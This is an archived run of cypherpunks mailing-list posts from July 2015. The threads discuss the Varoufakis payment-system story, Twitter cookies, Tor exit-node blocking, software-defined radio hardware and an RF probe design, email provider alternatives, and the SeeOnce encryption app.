Subject: Varoufakis claims had approval to plan parallel banking system for Greece
In-Reply-To:
References:
Message-ID:

wonder if said IT prof gonna get a little visit fr the federali's > capitalist fascist parasites

On Mon, Jul 27, 2015 at 1:38 AM, John Young wrote:

> Varoufakis claims had approval to plan parallel banking system for Greece
>
>
> http://www.ekathimerini.com/199945/article/ekathimerini/news/varoufakis-claims-had-approval-to-plan-parallel-banking-system
>
> Allegedly aided by Columbia University IT professor to design a hack of
> existing taxation systems.
>
> Columbia Computer Science Faculty
>
> http://www.cs.columbia.edu/people/faculty
>
>
>

--
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.

From jya at pipeline.com Mon Jul 27 04:13:40 2015
From: jya at pipeline.com (John Young)
Date: Mon, 27 Jul 2015 07:13:40 -0400
Subject: Varoufakis ridicules GR taxation hacking story
In-Reply-To: <20150727103431.GA2558@sivokote.iziade.m$>
References: <20150727103431.GA2558@sivokote.iziade.m$>
Message-ID:

twitter.com/yanisvaroufakis/status/625336067831558144

From Rayzer at riseup.net Mon Jul 27 10:46:03 2015
From: Rayzer at riseup.net (Razer)
Date: Mon, 27 Jul 2015 10:46:03 -0700
Subject: How do cookies on Twitter give me "safer experience"?
In-Reply-To: <20150727143624.GC2558@sivokote.iziade.m$>
References: <20150727143624.GC2558@sivokote.iziade.m$>
Message-ID: <55B66E5B.7000902@riseup.net>

On 07/27/2015 07:36 AM, Georgi Guninski wrote:
> With javascript and cookies disabled, go to https://twitter.com/
>
> Orange CSS shit which can't be closed with the "X" suggests:
>
>> Cookies help personalize Twitter content ... and provide you with a
>> better, faster, safer Twitter experience. By using our services, you
>> agree to our Cookie Use.
> Me fails to see how browsing Twitter with cookies enabled makes me
> any safer.
>
> How so?
>

Beyond the conspiratorial, perhaps the cookie contains the switch for the NSFW function account owners use when their tweets are...

... nsfw?

RR

From s at ctrlc.hu Mon Jul 27 02:14:27 2015
From: s at ctrlc.hu (stef)
Date: Mon, 27 Jul 2015 11:14:27 +0200
Subject: SIGINT and improving wireless privacy at the PHY
In-Reply-To:
References:
Message-ID: <20150727091426.GG6906@ctrlc.hu>

On Sun, Jul 26, 2015 at 09:01:22PM -0700, Jason McVetta wrote:
> The server at www.wirelessvillage.ninja sez: "Chances are, if you got this
> page, that means the server doesn't like something about you. You may be
> using an invalid HTTP option, or an evil browser string, or maybe just from
> a country we are leery of."

same from some random tor exitnode.
the ops seem to hate freedom or at least anon visitors

--
otr fp: https://www.ctrlc.hu/~stef/otr.txt

From wirelesswarrior at safe-mail.net Mon Jul 27 08:21:13 2015
From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net)
Date: Mon, 27 Jul 2015 11:21:13 -0400
Subject: SIGINT and improving wireless privacy at the PHY
Message-ID:

Probably the result of DDoS and other exploit attacks against the site.

> On Sun, Jul 26, 2015 at 09:01:22PM -0700, Jason McVetta wrote:
> > The server at www.wirelessvillage.ninja sez: "Chances are, if you got this
> > page, that means the server doesn't like something about you. You may be
> > using an invalid HTTP option, or an evil browser string, or maybe just from
> > a country we are leery of."
>
> same from some random tor exitnode. the ops seem to hate freedom or at least
> anon visitors
>
> --
> otr fp: https://www.ctrlc.hu/~stef/otr.txt

From guninski at guninski.com Mon Jul 27 03:34:31 2015
From: guninski at guninski.com (Georgi Guninski)
Date: Mon, 27 Jul 2015 13:34:31 +0300
Subject: Varoufakis claims had approval to plan parallel banking system for Greece
In-Reply-To:
References:
Message-ID: <20150727103431.GA2558@sivokote.iziade.m$>

On Sun, Jul 26, 2015 at 06:38:07PM -0400, John Young wrote:
> Varoufakis claims had approval to plan parallel banking system for Greece
>
> http://www.ekathimerini.com/199945/article/ekathimerini/news/varoufakis-claims-had-approval-to-plan-parallel-banking-system
>
> Allegedly aided by Columbia University IT professor to design a
> hack of existing taxation systems.
>
> Columbia Computer Science Faculty
>
> http://www.cs.columbia.edu/people/faculty

From TFA (looking for the best, but expecting the worst):

===
“But let me give you an example. We were planning along a number fronts. I will just mention one.
Take the case of the first few moments when the banks are shut, the ATMs don’t function and there has to be some parallel payment system by which to keep the economy going for a little while, to give the population the feel that the state is in control and that there is a plan.”
===

From wirelesswarrior at safe-mail.net Mon Jul 27 10:45:02 2015
From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net)
Date: Mon, 27 Jul 2015 13:45:02 -0400
Subject: Intercept receivers (was Re: Hackers Remotely Kill a Jeep onthe Highway)
Message-ID:

Peter and Jim,

-------- Original Message --------
From: jim bell
To: Peter Gutmann , "wirelesswarrior at Safe-mail.net"
Cc: "cypherpunks at cpunks.org"
Subject: Re: Intercept receivers (was Re: Hackers Remotely Kill a Jeep onthe Highway)
Date: Mon, 27 Jul 2015 15:31:17 +0000 (UTC)

From: Peter Gutmann

wirelesswarrior at Safe-mail.net writes:

>>For example, Ettus' USRPs, covering VHF to 6 GHz or so, starting under $1000,
>>that not long ago were in the $10,000s. The HackRF (which some have
>>complained is little more than an IF strip) effectively covering down to
>>below 10 Mhz is only $300 (though its performance, due to only 8-bit ADC, is
>>not in the same league as the 16-bit USRPs). If some hardware hacker were to
>>deliver a 14-16 bit ADC daughter board (there are affordable chips offering
>>up to 60M samples/sec) for the HackRF (it is provisioned to accept one) it
>>could substantially improve its use.

>The problem with the HackRF (and other USB-based devices) is the bandwidth of
>the USB connection, it's not that the HackRF hardware can't handle it, it's
>that you can't get that much data to the PC.

The HackRF contains a LPC4320 which has unused capacity for light DSP and other tasking. For any heavy DSP it could use a FPGA. It has an internal header for expansions like this (and/or a higher resolution ADC and its CPLD can be reflashed to accommodate such changes.
>(I have a HackRF - I needed a cheap way to track down some odd RFI issues -
>and it's a pretty cool piece of hardware for the money, but, as I mentioned
>earlier, you do get what you're paying for. If I could make a wishlist, it'd
>be nice to have a rev.2 with some work done on the front-end...).

The HackRF, like all wideband, direct conversion, receivers, can suffer LNA saturation from nearby/very strong out-of-band signals (pagers and FM broadcasts). A cheap, simple, solution is a coax notch filter, in line with the antenna. I've been experimenting with these and they seem to work very well.

From: jim bell

Here's my idea for a probe for an RF device. The wavelength of a 2.45 GHz signal (WiFi) is about 12 cm. A quarter-wave antenna would be 3 cm. Or, that 3 cm could be in the form of a loop, at the end of a piece of 'hardline', or other coaxial cable. (hardline would be best, I think, because it is a small diameter.)

https://en.wikipedia.org/wiki/Coaxial_cable

So, the diameter of the loop would be a bit more than 1 cm diameter, which is appropriate for finding tiny RF sources. One side of the loop would be connected to the center conductor of the coax, and the other side of the loop connected to the shield of the coax.

Note: The coax should probably have many dissipative RF beads strung along its length, in order to prevent the cable itself from picking up RF, and delivering to the loop on the end, thereby to be detected.

http://www.amidoncorp.com/small-ferrite-beads/

There are many different kinds of materials that such beads are made from; perhaps we can have an RF engineer chime in on the subject. He can also tell us if the loop is too-badly mismatched (RF impedance) to the coax to function well.

Jim Bell

Try it!

From jdb10987 at yahoo.com Mon Jul 27 08:31:17 2015
From: jdb10987 at yahoo.com (jim bell)
Date: Mon, 27 Jul 2015 15:31:17 +0000 (UTC)
Subject: Intercept receivers (was Re: Hackers Remotely Kill a Jeep on the Highway)
In-Reply-To: <9A043F3CF02CD34C8E74AC1594475C73AB070C77@uxcn10-tdc05.UoA.auckland.ac.nz>
References: <9A043F3CF02CD34C8E74AC1594475C73AB070C77@uxcn10-tdc05.UoA.auckland.ac.nz>
Message-ID: <2037801709.3450009.1438011077656.JavaMail.yahoo@mail.yahoo.com>

From: Peter Gutmann

wirelesswarrior at Safe-mail.net writes:

>>For example, Ettus' USRPs, covering VHF to 6 GHz or so, starting under $1000,
>>that not long ago were in the $10,000s. The HackRF (which some have
>>complained is little more than an IF strip) effectively covering down to
>>below 10 Mhz is only $300 (though its performance, due to only 8-bit ADC, is
>>not in the same league as the 16-bit USRPs). If some hardware hacker were to
>>deliver a 14-16 bit ADC daughter board (there are affordable chips offering
>>up to 60M samples/sec) for the HackRF (it is provisioned to accept one) it
>>could substantially improve its use.

>The problem with the HackRF (and other USB-based devices) is the bandwidth of
>the USB connection, it's not that the HackRF hardware can't handle it, it's
>that you can't get that much data to the PC.

>(I have a HackRF - I needed a cheap way to track down some odd RFI issues -
>and it's a pretty cool piece of hardware for the money, but, as I mentioned
>earlier, you do get what you're paying for. If I could make a wishlist, it'd
>be nice to have a rev.2 with some work done on the front-end...).

Here's my idea for a probe for an RF device. The wavelength of a 2.45 GHz signal (WiFi) is about 12 cm. A quarter-wave antenna would be 3 cm. Or, that 3 cm could be in the form of a loop, at the end of a piece of 'hardline', or other coaxial cable.
(hardline would be best, I think, because it is a small diameter.)

https://en.wikipedia.org/wiki/Coaxial_cable

So, the diameter of the loop would be a bit more than 1 cm diameter, which is appropriate for finding tiny RF sources. One side of the loop would be connected to the center conductor of the coax, and the other side of the loop connected to the shield of the coax.

Note: The coax should probably have many dissipative RF beads strung along its length, in order to prevent the cable itself from picking up RF, and delivering to the loop on the end, thereby to be detected.

http://www.amidoncorp.com/small-ferrite-beads/

There are many different kinds of materials that such beads are made from; perhaps we can have an RF engineer chime in on the subject. He can also tell us if the loop is too-badly mismatched (RF impedance) to the coax to function well.

Jim Bell

From guninski at guninski.com Mon Jul 27 05:38:23 2015
From: guninski at guninski.com (Georgi Guninski)
Date: Mon, 27 Jul 2015 15:38:23 +0300
Subject: Varoufakis claims had approval to plan parallel banking system for Greece
In-Reply-To: <01707B7A-7FC8-4220-8001-57567A44C59B@soydelbierzo.com>
References: <20150727103431.GA2558@sivokote.iziade.m$> <01707B7A-7FC8-4220-8001-57567A44C59B@soydelbierzo.com>
Message-ID: <20150727123823.GB2558@sivokote.iziade.m$>

On Mon, Jul 27, 2015 at 01:11:51PM +0200, Jorge SoydelBierzo wrote:
>
> Varoufakis denies this info http://twitter.com/yanisvaroufakis/status/625336067831558144
>
> Don't know what the truth is.

From TFA:

===
Recorded call

You can find extracts from the conversation below. Varoufakis was advised that the call was being recorded when it began.
===

===
Norman Lamont interrupts: "There are certainly others listening but they will not tell it to their friends."
Varoufakis (laughing): "I know. I know they are. And even if they do I will deny I said it
===

> > On 27/7/2015, at 12:34, Georgi Guninski wrote:
> >
> >> On Sun, Jul 26, 2015 at 06:38:07PM -0400, John Young wrote:
> >> Varoufakis claims had approval to plan parallel banking system for Greece
> >>
> >> http://www.ekathimerini.com/199945/article/ekathimerini/news/varoufakis-claims-had-approval-to-plan-parallel-banking-system
> >>
> >> Allegedly aided by Columbia University IT professor to design a
> >> hack of existing taxation systems.
> >>
> >> Columbia Computer Science Faculty
> >>
> >> http://www.cs.columbia.edu/people/faculty
> >
> > From TFA (looking for the best, but expecting the worst):
> >
> > ===
> > “But let me give you an example. We were planning along a number fronts.
> > I will just mention one. Take the case of the first few moments when the
> > banks are shut, the ATMs don’t function and there has to be some
> > parallel payment system by which to keep the economy going for a little
> > while, to give the population the feel that the state is in control and
> > that there is a plan.”
> > ===
> >
> >
> >

From guninski at guninski.com Mon Jul 27 07:36:24 2015
From: guninski at guninski.com (Georgi Guninski)
Date: Mon, 27 Jul 2015 17:36:24 +0300
Subject: How do cookies on Twitter give me "safer experience"?
Message-ID: <20150727143624.GC2558@sivokote.iziade.m$>

With javascript and cookies disabled, go to https://twitter.com/

Orange CSS shit which can't be closed with the "X" suggests:

> Cookies help personalize Twitter content ... and provide you with a
> better, faster, safer Twitter experience. By using our services, you
> agree to our Cookie Use.

Me fails to see how browsing Twitter with cookies enabled makes me any safer.

How so?
From carimachet at gmail.com Mon Jul 27 07:39:43 2015
From: carimachet at gmail.com (Cari Machet)
Date: Mon, 27 Jul 2015 17:39:43 +0300
Subject: Varoufakis ridicules GR taxation hacking story
In-Reply-To:
References: <20150727103431.GA2558@sivokote.iziade.m$>
Message-ID:

taking a little poll its sort of interrelated

why do people think that the fbi conducted > thru jeremy hammond > hacks of other governments stuff

for instance the universities, hospitals, oil companies that are state run

On Mon, Jul 27, 2015 at 2:13 PM, John Young wrote:

> twitter.com/yanisvaroufakis/status/625336067831558144
>
>
>

--
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.

From admin at pilobilus.net Mon Jul 27 17:00:06 2015
From: admin at pilobilus.net (Steve Kinney)
Date: Mon, 27 Jul 2015 20:00:06 -0400
Subject: SIGINT and improving wireless privacy at the PHY
In-Reply-To:
References:
Message-ID: <55B6C606.6090106@pilobilus.net>

On 07/27/2015 11:21 AM, wirelesswarrior at safe-mail.net wrote:
> Probably the result of DDoS and other exploit attacks against
> the site.
>
>> On Sun, Jul 26, 2015 at 09:01:22PM -0700, Jason McVetta
>> wrote:
>>> The server at www.wirelessvillage.ninja sez: "Chances are,
>>> if you got this page, that means the server doesn't like
>>> something about you. You may be using an invalid HTTP
>>> option, or an evil browser string, or maybe just from a
>>> country we are leery of."
>>
>> same from some random tor exitnode. the ops seem to hate
>> freedom or at least anon visitors

They seem to be subscribed to some list of TOR exit nodes and filter against that. I tried connecting via 3 nodes, 2 worked normally and one returned the polite FU notice.

:o)

From carimachet at gmail.com Mon Jul 27 16:49:01 2015
From: carimachet at gmail.com (Cari Machet)
Date: Tue, 28 Jul 2015 02:49:01 +0300
Subject: Varoufakis ridicules GR taxation hacking story
In-Reply-To:
References: <20150727103431.GA2558@sivokote.iziade.m$>
Message-ID:

http://t.co/9JTWNyq8JK

He made a statement on his blog but i cant fucking get on there to read it because the browser says connecting for 20 minutes now

On Jul 27, 2015 5:39 PM, "Cari Machet" wrote:

> taking a little poll its sort of interrelated
>
> why do people think that the fbi conducted > thru jeremy hammond > hacks
> of other governments stuff
>
> for instance the universities, hospitals, oil companies that are state run
>
> On Mon, Jul 27, 2015 at 2:13 PM, John Young wrote:
>
>> twitter.com/yanisvaroufakis/status/625336067831558144
>>
>>
>>
>
>
> --
> Cari Machet
> NYC 646-436-7795
> carimachet at gmail.com
> AIM carismachet
> Syria +963-099 277 3243
> Amman +962 077 636 9407
> Berlin +49 152 11779219
> Reykjavik +354 894 8650
> Twitter: @carimachet
>
> 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187
>
> Ruh-roh, this is now necessary: This email is intended only for the
> addressee(s) and may contain confidential information. If you are not the
> intended recipient, you are hereby notified that any use of this
> information, dissemination, distribution, or copying of this email without
> permission is strictly prohibited.
>
>
>

From l at odewijk.nl Mon Jul 27 10:59:32 2015
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Tue, 28 Jul 2015 02:59:32 +0900
Subject: How do cookies on Twitter give me "safer experience"?
In-Reply-To: <55B66E5B.7000902@riseup.net>
References: <20150727143624.GC2558@sivokote.iziade.m$> <55B66E5B.7000902@riseup.net>
Message-ID:

How is it faster to send a cookie with every request? ;)

Perhaps it's just "personalize" ergo Twitter earns more ergo everything gets better.

Perhaps don't look into copywriter ramblings.

From carimachet at gmail.com Mon Jul 27 20:09:28 2015
From: carimachet at gmail.com (Cari Machet)
Date: Tue, 28 Jul 2015 06:09:28 +0300
Subject: Varoufakis ridicules GR taxation hacking story
In-Reply-To:
References: <20150727103431.GA2558@sivokote.iziade.m$>
Message-ID:

http://www.nytimes.com/2015/07/28/business/greece-debt-varoufakis-recording.html?rref=business&module=Ribbon&version=context&region=Header&action=click&contentCollection=Business%20Day&pgtype=article

new york times now

On Tue, Jul 28, 2015 at 2:49 AM, Cari Machet wrote:

> http://t.co/9JTWNyq8JK
>
> He made a statement on his blog but i cant fucking get on there to read it
> because the browser says connecting for 20 minutes now
> On Jul 27, 2015 5:39 PM, "Cari Machet" wrote:
>
>> taking a little poll its sort of interrelated
>>
>> why do people think that the fbi conducted > thru jeremy hammond > hacks
>> of other governments stuff
>>
>> for instance the universities, hospitals, oil companies that are state run
>>
>> On Mon, Jul 27, 2015 at 2:13 PM, John Young wrote:
>>
>>> twitter.com/yanisvaroufakis/status/625336067831558144
>>>
>>>
>>>
>>
>>
>> --
>> Cari Machet
>> NYC 646-436-7795
>> carimachet at gmail.com
>> AIM carismachet
>> Syria +963-099 277 3243
>> Amman +962 077 636 9407
>> Berlin +49 152 11779219
>> Reykjavik +354 894 8650
>> Twitter: @carimachet
>>
>> 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187
>>
>> Ruh-roh, this is now necessary: This email is intended only for the
>> addressee(s) and may contain confidential information. If you are not the
>> intended recipient, you are hereby notified that any use of this
>> information, dissemination, distribution, or copying of this email
>> without
>> permission is strictly prohibited.
>>
>>
>>

--
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.

From jdb10987 at yahoo.com Mon Jul 27 23:11:20 2015
From: jdb10987 at yahoo.com (jim bell)
Date: Tue, 28 Jul 2015 06:11:20 +0000 (UTC)
Subject: Intercept receivers (was Re: Hackers Remotely Kill a Jeep on the Highway)
In-Reply-To: <2037801709.3450009.1438011077656.JavaMail.yahoo@mail.yahoo.com>
References: <9A043F3CF02CD34C8E74AC1594475C73AB070C77@uxcn10-tdc05.UoA.auckland.ac.nz> <2037801709.3450009.1438011077656.JavaMail.yahoo@mail.yahoo.com>
Message-ID: <493879029.4406688.1438063880373.JavaMail.yahoo@mail.yahoo.com>

From: jim bell
From: Peter Gutmann

wirelesswarrior at Safe-mail.net writes:

>>For example, Ettus' USRPs, covering VHF to 6 GHz or so, starting under $1000,
>>that not long ago were in the $10,000s. The HackRF (which some have
>>complained is little more than an IF strip) effectively covering down to
>>below 10 Mhz is only $300 (though its performance, due to only 8-bit ADC, is
>>not in the same league as the 16-bit USRPs). If some hardware hacker were to
>>deliver a 14-16 bit ADC daughter board (there are affordable chips offering
>>up to 60M samples/sec) for the HackRF (it is provisioned to accept one) it
>>could substantially improve its use.
>The problem with the HackRF (and other USB-based devices) is the bandwidth of
>the USB connection, it's not that the HackRF hardware can't handle it, it's
>that you can't get that much data to the PC.

>(I have a HackRF - I needed a cheap way to track down some odd RFI issues -
>and it's a pretty cool piece of hardware for the money, but, as I mentioned
>earlier, you do get what you're paying for. If I could make a wishlist, it'd
>be nice to have a rev.2 with some work done on the front-end...).

Do you know anything about this model: http://www.triarchytech.com/index.html 4, 6, 8, and 12 GHz units.

Jim Bell

From juan.g71 at gmail.com Tue Jul 28 02:16:16 2015
From: juan.g71 at gmail.com (Juan)
Date: Tue, 28 Jul 2015 06:16:16 -0300
Subject: another google nugget
Message-ID: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com>

Yep. I've forgotten about this one. Just the thing for all the list's neocunts.

https://en.wikipedia.org/wiki/Boston_Dynamics

"don't be evil"

From sswalow at gmail.com Tue Jul 28 05:01:00 2015
From: sswalow at gmail.com (swalow swalow)
Date: Tue, 28 Jul 2015 08:01:00 -0400
Subject: another google nugget
In-Reply-To: <20150728110953.GA2524@sivokote.iziade.m$>
References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$>
Message-ID:

Beginner question:
What are the alternatives?

From skquinn at rushpost.com Tue Jul 28 07:43:52 2015
From: skquinn at rushpost.com (Shawn K. Quinn)
Date: Tue, 28 Jul 2015 09:43:52 -0500
Subject: another google nugget
In-Reply-To:
References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$>
Message-ID: <1438094632.21834.1.camel@moonpatrol>

On Tue, 2015-07-28 at 08:01 -0400, swalow swalow wrote:
> Beginner question:
> What are the alternatives?

Fastmail, for one, though it does cost. I would imagine riseup.net is also an option for some.

>

--
Shawn K. Quinn

From wirelesswarrior at safe-mail.net Tue Jul 28 07:37:25 2015
From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net)
Date: Tue, 28 Jul 2015 10:37:25 -0400
Subject: Intercept receivers (was Re: Hackers Remotely Kill a Jeep onthe Highway)
Message-ID:

Jim,

Only what I have read. The reviews by professionals have been very favorable given its price though not in the same league as pro equipment. Some use it often to take into the field while leaving their expensive gear safe on the bench. The software is also well reviewed though closed source, AFAIK.

WW

-------- Original Message --------
From: jim bell
To: Peter Gutmann , "wirelesswarrior at Safe-mail.net"
Cc: "cypherpunks at cpunks.org"
Subject: Re: Intercept receivers (was Re: Hackers Remotely Kill a Jeep onthe Highway)
Date: Tue, 28 Jul 2015 06:11:20 +0000 (UTC)

>
>
> From: jim bell
> From: Peter Gutmann
>
>
>
> wirelesswarrior at Safe-mail.net writes:
>
>
>
> >>For example, Ettus' USRPs, covering VHF to 6 GHz or so, starting under $1000,
> >>that not long ago were in the $10,000s. The HackRF (which some have
> >>complained is little more than an IF strip) effectively covering down to
> >>below 10 Mhz is only $300 (though its performance, due to only 8-bit ADC, is
> >>not in the same league as the 16-bit USRPs). If some hardware hacker were to
> >>deliver a 14-16 bit ADC daughter board (there are affordable chips offering
> >>up to 60M samples/sec) for the HackRF (it is provisioned to accept one) it
> >>could substantially improve its use.
> > >The problem with the HackRF (and other USB-based devices) is the bandwidth of > >the USB connection, it's not that the HackRF hardware can't handle it, it's > >that you can't get that much data to the PC. > > >(I have a HackRF - I needed a cheap way to track down some odd RFI issues - > >and it's a pretty cool piece of hardware for the money, but, as I mentioned > >earlier, you do get what you're paying for. If I could make a wishlist, it'd > >be nice to have a rev.2 with some work done on the front-end...). > > Do you know anything about this model: http://www.triarchytech.com/index.html 4, 6, 8, and 12 GHz units. > > Jim Bell From loki at obscura.com Tue Jul 28 11:03:26 2015 From: loki at obscura.com (Lance Cottrell) Date: Tue, 28 Jul 2015 11:03:26 -0700 Subject: SIGINT and improving wireless privacy at the PHY In-Reply-To: <55B6C606.6090106@pilobilus.net> References: <55B6C606.6090106@pilobilus.net> Message-ID: <5E1BAF7F-CE32-41F8-9592-4A0E969734F2@obscura.com> Interesting. I wonder if they have had abuse issues from Tor. I know that the credit card fraud rate from Tor IP addresses is fierce, it is on par with countries like Nigeria, but this is not a merchant. -Lance -- Lance Cottrell loki at obscura.com > On Jul 27, 2015, at 5:00 PM, Steve Kinney wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On 07/27/2015 11:21 AM, wirelesswarrior at safe-mail.net wrote: >> Probably the result of DDoS and other exploit attacks against >> the site. >> >>> On Sun, Jul 26, 2015 at 09:01:22PM -0700, Jason McVetta >>> wrote: >>>> The server at www.wirelessvillage.ninja sez: "Chances are, >>>> if you got this page, that means the server doesn't like >>>> something about you.
You may be using an invalid HTTP >>>> option, or an evil browser string, or maybe just from a >>>> country we are leery of." >>> >>> same from some random tor exitnode. the ops seem to hate >>> freedom or at least anon visitors > > They seem to be subscribed to some list of TOR exit nodes and > filter against that. I tried connecting via 3 nodes, 2 worked > normally and one returned the polite FU notice. > > :o) From bbrewer at littledystopia.net Tue Jul 28 08:21:11 2015 From: bbrewer at littledystopia.net (bbrewer) Date: Tue, 28 Jul 2015 11:21:11 -0400 Subject: another google nugget In-Reply-To: <20150728144734.GM6906@ctrlc.hu> References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$> <1438094632.21834.1.camel@moonpatrol> <20150728144734.GM6906@ctrlc.hu> Message-ID: > On Jul 28, 2015, at 10:47 AM, stef wrote: > > is this mailinglist suddenly transformed to the libtech list?
cypherpunks i > believe build their own infrastructure, they work on remailers, and other > related stuff. what the hell happened? can someone foia what the codeword for > operation "disrupt cypherpunks mailinglist" is? > > the mind boggles. I wanted to hit the ‘like’ button on this, but I couldn’t find it. My internet must be broken. (I will agree hosting your own could be the way to go, however, running/admining your own box at home / work or hosted on a VPS each carry with them their own dangers of security, trust, yadda yadda). There is, as you state, a large difference between acknowledging these other options and their upsides/downsides, vs. simply not acknowledging their existence at all. Depressing. From tim at diffalt.com Tue Jul 28 08:57:23 2015 From: tim at diffalt.com (Tim Beelen) Date: Tue, 28 Jul 2015 11:57:23 -0400 Subject: another google nugget In-Reply-To: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> Message-ID: <55B7A663.5000704@diffalt.com> i like wobble bots. *wobble* *wobble* so cute. On 7/28/2015 5:16 AM, Juan wrote: > > Yep. I've forgotten about this one. > > Just the thing for all the list's neocunts. > > https://en.wikipedia.org/wiki/Boston_Dynamics > > "don't be evil" > > > From Rayzer at riseup.net Tue Jul 28 13:13:03 2015 From: Rayzer at riseup.net (Razer) Date: Tue, 28 Jul 2015 13:13:03 -0700 Subject: Fwd: [liberationtech] Introducing SeeOnce In-Reply-To: References: Message-ID: <55B7E24F.6080805@riseup.net> -------- Forwarded Message -------- Subject: Introducing SeeOnce Date: Mon, 27 Jul 2015 17:40:55 -0500 From: Francisco Ruiz Reply-To: liberationtech To: liberationtech Newsgroups: gmane.technology.liberationtech Hello LiberationTech subscribers, SeeOnce is a new web app that encrypts text and files with forward secrecy. This is achieved by changing keys with every message rather than using a server to store keys or encrypted material.
SeeOnce consists of a single, relatively small html document, which doesn't connect to any servers. It is based on a javascript implementation of TweetNaCl, plus WiseHash, a dictionary-based key entropy meter that adds a variable number of scrypt key stretching rounds for weaker keys. Forward secrecy is obtained through a protocol similar to OTR messaging, except that communications are expected to be asynchronous. SeeOnce connects to the browser's default email through conventional mailto and web links, so users don't need to install anything. Removal of ephemeral data can be done via a single button. Another important goal is to make key exchange transparent to the user, so that even complete novices can use it right away. Please take a look at SeeOnce and give us any suggestions you might think appropriate. The preferred way is by starting Issues at the project's GitHub page at: https://github.com/fruiz500/SeeOnce The app is directly downloadable from https://seeonce.net. A Chrome app, able to synchronize its data through Google servers, is available at: https://chrome.google.com/webstore/detail/seeonce-privacy/jbcllagadcpaafoeknfklbenimcopnfc Thank you very much. -- Francisco Ruiz Associate Professor MMAE department Illinois Institute of Technology PL22ezLok=gqqjw-pq3eu-sgzpp-j87cn-fh7ik-6kvmn-comx2-b4xfn-gihga-s46e4=PL22ezLok h**ps://www 'dot' youtube 'dot' com/watch?v=UOJXI8E0lKY get the PassLok privacy app at: https://passlok.com -------------- next part -------------- A non-text attachment was scrubbed...
Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From guninski at guninski.com Tue Jul 28 04:09:53 2015 From: guninski at guninski.com (Georgi Guninski) Date: Tue, 28 Jul 2015 14:09:53 +0300 Subject: another google nugget In-Reply-To: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> Message-ID: <20150728110953.GA2524@sivokote.iziade.m$> On Tue, Jul 28, 2015 at 06:16:16AM -0300, Juan wrote: > > > Yep. I've forgotten about this one. > > Just the thing for all the list's neocunts. > > https://en.wikipedia.org/wiki/Boston_Dynamics > > "don't be evil" Weird to send this from @gmail account. Are you supporting @gmail? From s at ctrlc.hu Tue Jul 28 05:24:46 2015 From: s at ctrlc.hu (stef) Date: Tue, 28 Jul 2015 14:24:46 +0200 Subject: another google nugget In-Reply-To: References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$> Message-ID: <20150728122446.GL6906@ctrlc.hu> On Tue, Jul 28, 2015 at 08:01:00AM -0400, swalow swalow wrote: > Beginner question: > What are the alternatives? hosting your own??? jeez. 
-- otr fp: https://www.ctrlc.hu/~stef/otr.txt From eugen at leitl.org Tue Jul 28 07:55:56 2015 From: eugen at leitl.org (Eugen Leitl) Date: Tue, 28 Jul 2015 14:55:56 +0000 Subject: the LibGen situation Message-ID: <20150728145556.GG18664@leitl.org> https://www.reddit.com/r/Scholar/comments/3bs1rm/meta_the_libgenscihub_thread_howtos_updates_and/ From list at sysfu.com Tue Jul 28 16:22:42 2015 From: list at sysfu.com (Seth) Date: Tue, 28 Jul 2015 16:22:42 -0700 Subject: True Crypt is Not Secure In-Reply-To: <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> References: <1437752365-sup-6750@metis.syd1.tesser.org> <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> Message-ID: On Tue, 28 Jul 2015 15:40:55 -0700, oshwm wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > So is anyone working on building an 'openfab' or is it such a big task > that everyone just backs away in horror? :D My understanding is that the capital costs involved with building and operating a chip fabrication plant are astronomical, although the situation may be getting better. [1] [1] http://spectrum.ieee.org/semiconductors/design/the-new-economics-of-semiconductor-manufacturing From grarpamp at gmail.com Tue Jul 28 13:43:07 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 28 Jul 2015 16:43:07 -0400 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B56493.7020603@pilobilus.net> References: <55B3EBED.5060702@riseup.net> 